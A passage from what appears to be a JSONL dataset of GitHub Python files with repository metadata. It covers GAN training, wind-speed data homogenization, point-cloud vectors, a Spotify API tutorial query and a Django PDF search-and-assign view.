print('saving the model at the end of epoch %d, iters %d' %\n (epoch, total_steps))\n model.save('latest')\n # TODO: hist only save at every 5 epochs\n hist = {'plot_data': visualizer.plot_data,\n 'metric': visualizer.metric_data}\n p = os.path.join(model.save_dir, \"history.pth\")\n torch.save(hist, p)\n model.save(epoch)\n if ssim > ssim_best:\n ssim_best=ssim\n model.save('ssim_best')\n print('saving the ssim_best model (epoch %d, total_steps %d, ssim %f)' % (epoch, total_steps,ssim))\n if lpips < lpips_best:\n lpips_best=lpips\n model.save('lpips_best')\n print('saving the lpips_best model (epoch %d, total_steps %d, lpips %f)' % (epoch, total_steps, lpips))\n\n print('End of epoch %d / %d \\t Time Taken: %d sec' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n lr = model.update_learning_rate()\n with open(visualizer.log_name, \"a\") as log_file:\n log_file.write('Learning Rate = %f\\n' % lr)\n log_file.write('================End of epoch %d / %d \\t Time Taken: %d sec ================\\n' %\n (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))\n visualizer.train_log_writer.close()\n visualizer.val_log_writer.close()", "repo_name": "Andreas00612/InfraGANV2", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5686, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "options.train_options.TrainOptions", "line_number": 19, "usage_type": "call"}, {"api_name": "data.data_loader.CreateDataLoader", "line_number": 20, "usage_type": "call"}, {"api_name": "models.models.create_model", "line_number": 25, "usage_type": "call"}, {"api_name": "util.visualizer.Visualizer", "line_number": 26, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 30, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 31, "usage_type": "call"}, {"api_name": "eval.Evalulate", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 37, "usage_type": "call"}, {"api_name": "time.time", "line_number": 43, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 47, "usage_type": "name"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 55, "usage_type": "argument"}, {"api_name": "data.data_loader", "line_number": 57, "usage_type": "argument"}, {"api_name": "time.time", "line_number": 68, "usage_type": "call"}, {"api_name": "time.time", "line_number": 79, "usage_type": "call"}, {"api_name": "data.data_loader", "line_number": 80, "usage_type": "name"}, {"api_name": "eval.eval", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 107, "usage_type": "call"}, {"api_name": "time.time", "line_number": 119, "usage_type": "call"}, {"api_name": "time.time", "line_number": 124, "usage_type": "call"}]}
+{"seq_id": "14461642420", "text": "from abc import ABC, abstractmethod\nfrom typing import Literal\n\nPaginatedItemsDict = dict[int, list[dict]]\nPlatform = Literal[\"pc\", \"mobile\"]\nSortByDict = dict[str, str | int | bool]\nOrder = Literal[\"asc\", \"desc\"]\n\n\nclass ItemInterface(ABC):\n\n @abstractmethod\n def get_items(self, data: dict[str, any]) -> tuple[PaginatedItemsDict, int]:\n ...\n\n @abstractmethod\n def get_items_manufacturer(self, data: dict) -> dict[list[str]]:\n ...\n\n @abstractmethod\n def get_item(self, data: dict) -> tuple[dict[str, dict], int]:\n ...\n", "repo_name": "Psylo2/pablo_backend_store_api", "sub_path": "application/interfaces/usecases/item/item_interface.py", "file_name": "item_interface.py", "file_ext": "py", "file_size_in_byte": 558, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.Literal", "line_number": 5, "usage_type": "name"}, {"api_name": "typing.Literal", "line_number": 7, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 10, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 12, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 16, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "36588450019", "text": "#coding=utf-8\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport pandas as pd\nimport parameter\nfrom customizeFunction import function as custfunc\nfrom dateutil.parser import parse\nimport datetime\nimport re\nimport time\nfrom decimal import Decimal\nimport math\n\nclass homogenization:\n def __int__(self):\n pass\n def detectHomogen(self,begY,endY,Vmax): #均一性检验\n VmaxO = Vmax[0:endY-begY+1]\n mO = len(VmaxO)\n F = []\n for i in range(5,mO-5): #滑动计算F,掐头去尾5年,避免子序列过短\n X1 = VmaxO[0:i]\n X2 = VmaxO[i:mO]\n iF = self.calcF(X1,X2)\n F.append(iF)\n F = np.array(F)\n Fmax = np.max(F)\n if Fmax>5:\n #print(\"F test Ok\")\n idx = np.argmax(F)\n idx += 5\n homoYear = begY + idx\n return (homoYear,Fmax) #返回突变年\n else:\n return False\n \n def calcF(self,X1,X2):\n n1 = len(X1)\n n2 = len(X2)\n n = n1+n2\n x1Mean = np.mean(X1)\n x2Mean = np.mean(X2)\n x1VarS = np.sum(np.square(X1-x1Mean)) # 方差\n x2VarS = np.sum(np.square(X2-x2Mean))\n arg0 = n1*n2/n\n arg0 = arg0*(x1Mean-x2Mean)**2\n arg1 = x1VarS + x2VarS\n Fvalue = arg0/arg1*(n-2) # F检验\n return Fvalue\n \n def correctVmax(self,iKey,begY,endY,homoYear,Vmax):\n '''\n homoYear-endY之间订正\n begY-homoYear城市化之前、endY-len(Vmax)台站迁移之后不变\n ''' \n n1 = homoYear - begY \n n2 = endY - homoYear+1\n n3 = len(Vmax)-n1-n2\n VmaxB = Vmax[0:n1] # B:Before homoYear\n meanB = np.mean(VmaxB)\n stdB = np.std(VmaxB)\n VmaxA = Vmax[n1:n1+n2] # A:After homoYear(include)\n VmaxU = VmaxA-meanB\n meanU = np.mean(VmaxU)\n stdU = np.std(VmaxU)\n n = []\n m = []\n VmaxC = [] # correct\n for i in range(len(VmaxA)):\n iN = 10.0*np.abs(VmaxA[i]-meanB)/stdB+0.5\n iM = 10.0*(VmaxU[i]-meanU)/stdU+0.5\n iN = int(iN)\n iM = int(iM)\n iVmaxC = VmaxA[i]+ (iN*stdB+iM*stdU)/10.0 # C:Correct\n if np.abs(iVmaxC-meanB)>3*stdB:\n if iVmaxC>meanB:\n iVmaxC = meanB+3*stdB\n else:\n iVmaxC = meanB-3*stdB\n VmaxC.append(iVmaxC)\n VmaxC = np.array(VmaxC)\n VmaxAll = np.append(list(VmaxB),list(VmaxC))\n if n3>0:\n VmaxHE = list(Vmax[n1+n2:len(Vmax)]) # homeYear-endY\n VmaxAll = np.append(VmaxAll,VmaxHE)\n outputFileName = r\"obs_data/\"+iKey+\"_obs_vmax_correct.csv\"\n np.savetxt(outputFileName,VmaxAll, delimiter = ',', fmt='%s') \n return VmaxAll\n\nif __name__ == '__main__':\n # get parameter\n parameter = parameter.SiteInfo()\n allObsInfo = parameter.allObsInfo()\n homo = homogenization()\n fontsize = 14\n myfont = mpl.font_manager.FontProperties(fname=r'./chinese_font/simhei.ttf',size=fontsize)\n plt.figure(figsize=(16, 16))\n fig = plt.gcf()\n plt.rcParams['savefig.dpi'] = 800 #像素\n plt.rcParams['figure.dpi'] = 800 #分辨率\n figNum = 0\n for iKey in allObsInfo.keys(): \n figNum += 1\n ax = plt.subplot(6,2,figNum)\n obsFileName=r\"obs_data/\"+iKey+\"_obs_vmax.csv\"\n print(\"reading from\",obsFileName)\n dataset = pd.read_csv(obsFileName,header=None,sep=',')\n dataset = np.array(dataset)\n m ,n = np.shape(dataset)\n Vmax = dataset[:,0] # wind speed\n begY = allObsInfo[iKey]['begY'] \n endY = allObsInfo[iKey]['endY'] \n begY1 = begY\n endY1 = endY\n iX = range(begY,endY+1)\n plt.plot(iX,Vmax,'ro-',label=u'订正前', linewidth=1)\n if iKey == '59754': #徐闻气象站2003年搬迁\n endY1 = 2003 \n if iKey == '59663': #阳江气象站2004年搬迁\n endY1 = 2003\n if iKey == '58941': #长乐气象站2005年搬迁\n endY1 = 2004\n #if iKey == '58843': #霞浦气象站20017年搬迁\n # endY1 = 2006 \n Ftest = homo.detectHomogen(begY1,endY1,Vmax)\n if Ftest != False:\n print(Ftest[0],Ftest[1])\n homoYear = Ftest[0]\n VmaxC = 
homo.correctVmax(iKey,begY1,endY1,homoYear,Vmax)\n plt.plot(iX,VmaxC,'bo-',label=u'订正后', linewidth=1)\n VmaxMAX = np.max([np.max(Vmax),np.max(VmaxC)])\n VmaxMin = np.min([np.min(Vmax),np.min(VmaxC)])\n textInfo = u\"订正年份:\"+str(homoYear)+\"-\"+str(endY1)\n plt.text(iX[int(len(iX)/2)],VmaxMAX-1,textInfo,fontproperties=myfont,fontsize=fontsize)\n else:\n print(\"F test failure!!!\")\n VmaxMAX = np.max(Vmax)\n VmaxMin = np.min(Vmax)\n textInfo = u\"未订正\"\n plt.text(iX[int(len(iX)/2)],VmaxMAX-1,textInfo,fontproperties=myfont,fontsize=fontsize)\n plt.ylabel(u'Vmax(m/s)', fontproperties=myfont,fontsize=fontsize) \n plt.xlabel(u'年份', fontproperties=myfont,fontsize=fontsize) \n plt.ylim(VmaxMin-2,VmaxMAX+3)\n plt.legend(loc='upper right', frameon=False, prop=myfont,fontsize=fontsize)\n iStationInfo = iKey+\":\"+allObsInfo[iKey]['name']\n plt.text(iX[0],VmaxMAX-1,iStationInfo,fontproperties=myfont,fontsize=fontsize)\n plt.tight_layout()\n figName = 'allWeatherStationCorrectionObsVmax.png'\n fig.savefig(figName)\n plt.close()\n\n\n\n", "repo_name": "islandowner95/typhoon-risk-final", "sub_path": "typhoonRiskV4p0/homogenization.py", "file_name": "homogenization.py", "file_ext": "py", "file_size_in_byte": 5599, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.square", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 89, "usage_type": "call"}, {"api_name": "parameter.SiteInfo", "line_number": 94, "usage_type": "call"}, {"api_name": "parameter.allObsInfo", "line_number": 95, "usage_type": "call"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 98, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 98, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 99, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 99, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 101, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 101, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 102, 
"usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 102, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 109, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 110, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 132, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 134, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.text", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 144, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.text", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 152, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 152, "usage_type": "name"}]}
+{"seq_id": "4714838909", "text": "#\nimport os;\nimport torch;\nimport numpy as np;\nimport h5py;\n\ndef cv(h5fname):\n h5f = h5py.File(h5fname,'r');\n label = np.array(h5f['label']);\n pts = np.array(h5f['pts']);\n v = [];\n for i in range(label.shape[0]):\n lbl = label[i,:];\n plst = [];\n for l in range(np.min(lbl),np.max(lbl)):\n p = np.array( pts[i,lbl==l,:] );\n if p.size > 1:\n plst.append(p);\n #\n if len(plst) > 1:\n for pi in range(len(plst)-1):\n for pj in range(pi+1,len(plst)):\n if plst[pi].shape[0] > plst[pj].shape[0]:\n vec = np.mean(plst[pj],axis=0) - np.mean(plst[pi],axis=0);\n else:\n vec = np.mean(plst[pi],axis=0) - np.mean(plst[pj],axis=0);\n v.append(vec);\n X = None;\n if len(v) > 0:\n X = np.stack(v);\n h5f.close();\n return X;", "repo_name": "samhu1989/PON", "sub_path": "util/partrl/cv.py", "file_name": "cv.py", "file_ext": "py", "file_size_in_byte": 930, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "h5py.File", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 30, "usage_type": "call"}]}
+{"seq_id": "9883205937", "text": "import pprint\nimport requests #need to install it from the command line using pip\n\n'''\n1. Prompt the user for a search term \n2. Query the Spotify tracks endpoint for the search term\n3. Print the song name and the artist(s) who wrote it. \n'''\n\nsearch_term = 'Beyonce'\n\n# create query url:\nurl = 'https://www.apitutor.org/spotify/simple/v1/search?type=track&q='\nurl += search_term\n\n# print it:\nprint(url)\n\n# retrieve the data:\nresponse = requests.get(url)\ntracks = response.json()\n\npprint.pprint(tracks) # print all the tracks to the screen", "repo_name": "eecs110/fall2021", "sub_path": "course-files/lectures/lecture22/03_spotify_data.py", "file_name": "03_spotify_data.py", "file_ext": "py", "file_size_in_byte": 538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "pprint.pprint", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "40390208119", "text": "\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import transaction\nfrom django.db import connection\n\nfrom enersectapp.models import *\n\nfrom django.shortcuts import render_to_response\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.core.urlresolvers import reverse\nfrom django.shortcuts import get_object_or_404, render, redirect,render_to_response\n\nfrom pyPdf import PdfFileWriter, PdfFileReader\nfrom urllib2 import Request, urlopen\nfrom StringIO import StringIO\n\n\nfrom django.views import generic\nfrom django.utils import timezone\nfrom datetime import timedelta\nimport datetime\n\n\nimport random\n\ndef search_tool(request):\n \n the_user = request.user\n \n if not request.user.is_authenticated():\n \n return HttpResponseRedirect(reverse('enersectapp:app_login', args=()))\n \n if len(the_user.groups.filter(name=\"TeamLeaders\")) >0:\n \n user_type = \"TeamLeader\"\n \n elif the_user.is_superuser == True :\n \n user_type = \"superuser\"\n \n else:\n \n user_type = \"user\"\n\n ###COMMON BLOCK### \n \n #word = p.pdf_searchword\n word=\"all\"\n word_amount= \"\"\n word_amount_credit= \"\"\n word_amount_debit= \"\"\n word_companyname=\"\"\n word_date=\"\"\n word_docname=\"\"\n word_id_docname=\"\"\n word_accountnumber=\"\"\n word_movnumber=\"\"\n word_journal=\"\"\n word_s=\"\"\n word_lett=\"\"\n word_id=\"\"\n word_job_directory=\"\"\n word_multipart_filename=\"\"\n corpus_word=\"\"\n filter_word = \"\"\n search_options = \"\"\n records_list=[]\n \n try:\n word_amount = request.POST['search_word_amount']\n except (KeyError):\n \n word_amount = \"\"\n \n try:\n word_amount_credit = request.POST['search_word_amount_credit']\n except (KeyError):\n \n word_amount_credit = \"\"\n \n try:\n word_amount_debit = request.POST['search_word_amount_debit']\n except (KeyError):\n \n word_amount_debit = \"\"\n \n try:\n word_amount = request.POST['search_word_amount']\n except (KeyError):\n \n word_amount = \"\"\n \n \n try:\n word_companyname = request.POST['search_word_companyname']\n except (KeyError):\n \n word_companyname=\"\"\n \n try:\n word_date = request.POST['search_word_date']\n except (KeyError):\n \n word_date=\"\"\n \n try:\n word_doctype = request.POST['search_word_doctype']\n except (KeyError):\n \n word_doctype=\"\"\n \n try:\n word_piecenumber = request.POST['search_word_piecenumber']\n except (KeyError):\n \n word_piecenumber=\"\"\n \n try:\n word_docname = request.POST['search_word_docname']\n except (KeyError):\n \n word_docname=\"\"\n \n try:\n word_id_docname = request.POST['search_word_id_docname']\n except (KeyError):\n \n word_id_docname=\"\"\n \n try:\n word_accountnumber = request.POST['search_word_accountnumber']\n except (KeyError):\n \n word_accountnumber=\"\"\n \n try:\n word_movnumber = request.POST['search_word_movnumber']\n except (KeyError):\n \n word_movnumber=\"\"\n \n try:\n word_journal = request.POST['search_word_journal']\n except (KeyError):\n \n word_journal=\"\"\n \n try:\n word_s = request.POST['search_word_s']\n except (KeyError):\n \n word_s=\"\"\n \n try:\n word_lett = request.POST['search_word_lett']\n except (KeyError):\n \n word_lett=\"\"\n \n try:\n word_id = request.POST['search_word_id']\n except (KeyError):\n \n word_id=\"\"\n \n try:\n word_job_directory = request.POST['search_job_directory']\n except (KeyError):\n \n word_job_directory=\"\"\n \n 
try:\n word_multipart_filename = request.POST['search_word_multipart_filename']\n except (KeyError):\n \n word_multipart_filename=\"\"\n \n try:\n corpus_word = request.POST['corpus_word']\n except (KeyError):\n \n corpus_word = \"corpus_ocr_records\"\n \n try:\n filter_word = request.POST['filter_word']\n except (KeyError):\n \n filter_word = \"pdf_all\"\n \n try:\n id_assign = request.POST['id_assign']\n except (KeyError):\n \n id_assign = \"none\"\n\n try:\n assign_search_results = request.POST['assign_search_results']\n except (KeyError):\n \n assign_search_results = \"none\"\n \n \n \n try:\n category_fields_order_list = request.POST['category_fields_order_list']\n category_fields_order_list = str(category_fields_order_list)\n \n except (KeyError):\n \n category_fields_order_list = \"\"\n \n \n #word = str(word)\n word_amount= str(word_amount).encode(\"utf8\")\n word_amount_credit= str(word_amount_credit).encode(\"utf8\")\n word_amount_debit= str(word_amount_debit).encode(\"utf8\")\n word_companyname= word_companyname.encode(\"utf8\")\n word_date= str(word_date).encode(\"utf8\")\n word_doctype= str(word_doctype).encode(\"utf8\")\n word_piecenumber= str(word_piecenumber).encode(\"utf8\")\n word_docname= str(word_docname).encode(\"utf8\")\n word_id_docname= str(word_id_docname).encode(\"utf8\")\n word_accountnumber= str(word_accountnumber).encode(\"utf8\")\n word_movnumber= str(word_movnumber).encode(\"utf8\")\n word_journal= str(word_journal).encode(\"utf8\")\n word_s= str(word_s).encode(\"utf8\")\n word_lett= str(word_lett).encode(\"utf8\")\n word_id= str(word_id).encode(\"utf8\")\n word_job_directory= str(word_job_directory).encode(\"utf8\")\n word_multipart_filename= str(word_multipart_filename).encode(\"utf8\")\n filter_word = filter_word.lower() \n corpus_word = corpus_word.lower()\n \n\n \n #DocTypes list for the Menu\n \n types_list = SourceDocType.objects.exclude(name=\"other\").exclude(name=\"recuperation\").exclude(name=\"blank probable\").order_by('name')\n \n #Company Names list for the Menu\n \n companyname_list = CompanyTemplate.objects.all().order_by('companyname_base').values_list('companyname_base',flat=True).distinct()\n \n actual_min_num = 1\n \n try:\n prev_next_results = request.POST['prev_next_results']\n prev_next_results = str(prev_next_results)\n except (KeyError):\n \n prev_next_results = \"\"\n \n try:\n actual_min_num = request.POST['actual_min_num']\n actual_min_num = int(actual_min_num)\n except (KeyError):\n \n actual_min_num = 1\n \n \n\n if(prev_next_results == \"\"):\n actual_min_num = 0\n \n if(prev_next_results == \"Prev\"):\n actual_min_num -= 50\n \n if(prev_next_results == \"Next\"):\n actual_min_num += 50\n \n if(prev_next_results == \"Update\"):\n actual_min_num = actual_min_num\n \n if actual_min_num < 1:\n \n actual_min_num = 1\n \n \n max_num = actual_min_num + 50\n \n \n ###END OF COMMON BLOCK### \n \n #Corpus block\n \n if corpus_word==\"corpus_source_records\":\n \n # If button \"Assign to Group\" is pressed by the superuser or TeamLeader, there is access to this block,\n # which creates a SourcePdfToHandle for the SourcePdf chosen, and assigns it to the company of that user.\n \n if (user_type == \"superuser\" or user_type == \"TeamLeader\") and id_assign !=\"none\":\n \n \n id_assign = int(id_assign)\n \n source = SourcePdf.objects.filter(pk = id_assign)\n \n user_group = the_user.groups.all().exclude(name=\"TeamLeaders\").exclude(name=\"Auditors\").exclude(name=\"TeamAuditors\").exclude(name=\"Arabic\")[0]\n none_user = 
User.objects.get(username=\"None\")\n \n if len(source):\n \n source = source[0] \n tohandle = SourcePdfToHandle(assignedcompany=user_group,assigneduser=none_user,lot_number=-1)\n tohandle.save()\n source.assigndata.add(tohandle)\n source.save()\n \n \n #Filters block\n \n if filter_word==\"source_assigned\":\n \n records_list = SourcePdf.objects.exclude(assigndata=None)\n \n elif filter_word==\"source_notassigned\":\n \n records_list = SourcePdf.objects.filter(assigndata=None)\n \n else:\n \n filter_word=\"source_all\"\n records_list = SourcePdf.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = SourcePdf.objects.none()\n \n \n #Check which Search Options are covered\n \n\n if len(word_job_directory) != 0:\n isJobdirectory = True\n \n else:\n isJobdirectory = False\n \n if len(word_docname) != 0:\n isDocname = True\n \n else:\n isDocname = False\n \n if len(word_doctype) != 0:\n isDoctype = True\n \n else:\n isDoctype = False\n \n if len(word_multipart_filename) != 0:\n isMultipartfilename = True\n \n else:\n isMultipartfilename = False\n \n if len(word_id_docname) != 0:\n isIdDocname = True\n \n else:\n isIdDocname = False\n \n\n #When at least a word is being searched and there are no Search Options\n \n if word ==\"all\" and isJobdirectory == False and isDocname == False and isDoctype == False and isMultipartfilename == False and isIdDocname == False:\n \n #helper_list = temp_list.filter(ocrrecord_link__Company__icontains=word) | temp_list.filter(ocrrecord_link__Amount__icontains=word) | temp_list.filter(ocrrecord_link__IssueDate__icontains=word)\n\n final_list = records_list\n \n # Unused filters:\n '''no_options_wordlist.filter(sourcedoc_link__filename__icontains=word)| no_options_wordlist.filter(modification_date=word) | no_options_wordlist.filter(record_link__name__icontains=word) | no_options_wordlist.filter(filename__icontains=word) '''\n\n #When there are Search Options (Amount,etc)\n \n else:\n \n final_list=temp_list\n \n \n if isJobdirectory:\n \n if word_job_directory.startswith('\"') and word_job_directory.endswith('\"'):\n \n word_job_directory = word_job_directory.replace('\"', '')\n helper_list = final_list.filter(job_directory__iexact=word_job_directory)\n word_job_directory = '\"'+word_job_directory+'\"'\n \n else:\n \n helper_list = final_list.filter(job_directory__icontains=word_job_directory)\n \n \n final_list = helper_list\n \n \n if isDocname:\n \n if word_docname.startswith('\"') and word_docname.endswith('\"'):\n \n word_docname = word_docname.replace('\"', '')\n helper_list = final_list.filter(filename__iexact=word_docname)\n word_docname = '\"'+word_docname+'\"'\n \n else:\n \n helper_list = final_list.filter(filename__icontains=word_docname)\n \n final_list = helper_list\n\n if isDoctype:\n \n doctype = SourceDocType.objects.filter(pretty_name__iexact=word_doctype)|SourceDocType.objects.filter(name__iexact=word_doctype.lower())\n doctype = doctype.distinct()\n \n if len(doctype) == 1:\n \n helper_list = final_list.filter(modified_document_type = doctype[0])\n final_list = helper_list\n \n if isMultipartfilename:\n \n if word_multipart_filename.startswith('\"') and word_multipart_filename.endswith('\"'):\n \n word_multipart_filename = word_multipart_filename.replace('\"', '')\n helper_list = final_list.filter(multipart_filename__iexact=word_multipart_filename)\n word_multipart_filename = '\"'+word_multipart_filename+'\"'\n \n else:\n \n helper_list = 
final_list.filter(multipart_filename__icontains=word_multipart_filename)\n \n final_list = helper_list\n \n if isIdDocname:\n \n separated_string = word_id_docname.split('.', 1)\n \n if len(separated_string) == 2:\n helper_list = final_list.filter(pk=separated_string[0],filename=separated_string[1])\n final_list = helper_list\n \n else:\n final_list = PdfRecord.objects.none()\n \n \n records_list = final_list \n \n total_records = records_list.count()\n \n if max_num > total_records:\n \n max_num = total_records\n \n if actual_min_num > max_num and max_num != 0:\n \n actual_min_num = max_num\n \n if records_list:\n \n #Sort by Categories depending on the user's input in the Search Tool:\n \n \n category_fields_order_list = category_fields_order_list.split(',')\n \n category_temp_list = filter(bool, category_fields_order_list)\n \n \n if len(category_temp_list):\n \n for item in category_temp_list:\n if len(item):\n \n records_list = records_list.order_by(item)\n \n \n else:\n records_list = records_list.order_by('pk')\n \n \n category_fields_order_list = \",\".join(category_temp_list)\n \n merging_records = records_list\n records_list = records_list[actual_min_num-1:max_num]\n \n # If button \"Assign To Group from Search Results\" is pressed by the superuser or TeamLeader, there is access to this block,\n # which creates a SourcePdfToHandle for the SourcePdf that resulted from the Search, and assigns it to the company of that user.\n \n if (user_type == \"superuser\" or user_type == \"TeamLeader\") and assign_search_results !=\"none\":\n \n\n user_group = the_user.groups.all().exclude(name=\"TeamLeaders\").exclude(name=\"Auditors\").exclude(name=\"TeamAuditors\").exclude(name=\"Arabic\")[0]\n none_user = User.objects.get(username=\"None\")\n \n if len(merging_records):\n \n with transaction.commit_on_success():\n for source in merging_records:\n \n already_assigned = source.assigndata.all()\n \n if len(already_assigned) == 0:\n \n memo_report = \"Pressed Assign To Group from Search Results in Search Tool. Assigned to Group: \"+user_group.name+\". This being PK.\"+str(source.pk)+\". It was previously unassigned. 
Type was: \"+source.modified_document_type.name\n \n report = Report(report_type=\"Search Tool\",report_subtype=\"search_tool_assign_search_results\",report_author=the_user,report_company=user_group,report_date=datetime.datetime.now().replace(tzinfo=timezone.utc),report_memo = memo_report)\n report.save()\n \n tohandle = SourcePdfToHandle(assignedcompany=user_group,assigneduser=none_user,lot_number=-1)\n tohandle.save()\n source.assigndata.add(tohandle)\n source.save()\n \n \n \n \n elif corpus_word==\"corpus_ocr_records\":\n \n #Filters block\n \n \n if filter_word==\"pdf_error\":\n \n records_list = PdfRecord.objects.filter(commentary__contains=\"Error detected\")\n \n elif filter_word==\"pdf_linked\":\n \n records_list = PdfRecord.objects.filter(status=\"pdf_linked\")\n \n elif filter_word==\"pdf_unlinked\":\n \n records_list = PdfRecord.objects.filter(status=\"pdf_unlinked\")\n \n else:\n \n filter_word=\"pdf_all\"\n records_list = PdfRecord.objects.all()\n\n #Making lists to use in the Search of Coincidences\n \n temp_list = records_list\n final_list = PdfRecord.objects.none()\n \n \n #Check which Search Options are covered\n \n\n if len(word_amount) != 0:\n isAmount = True\n \n else:\n isAmount = False\n \n\n if len(word_companyname) != 0:\n isCompanyname = True\n \n else:\n isCompanyname = False\n \n \n if len(word_date) != 0:\n isDate = True\n \n else:\n 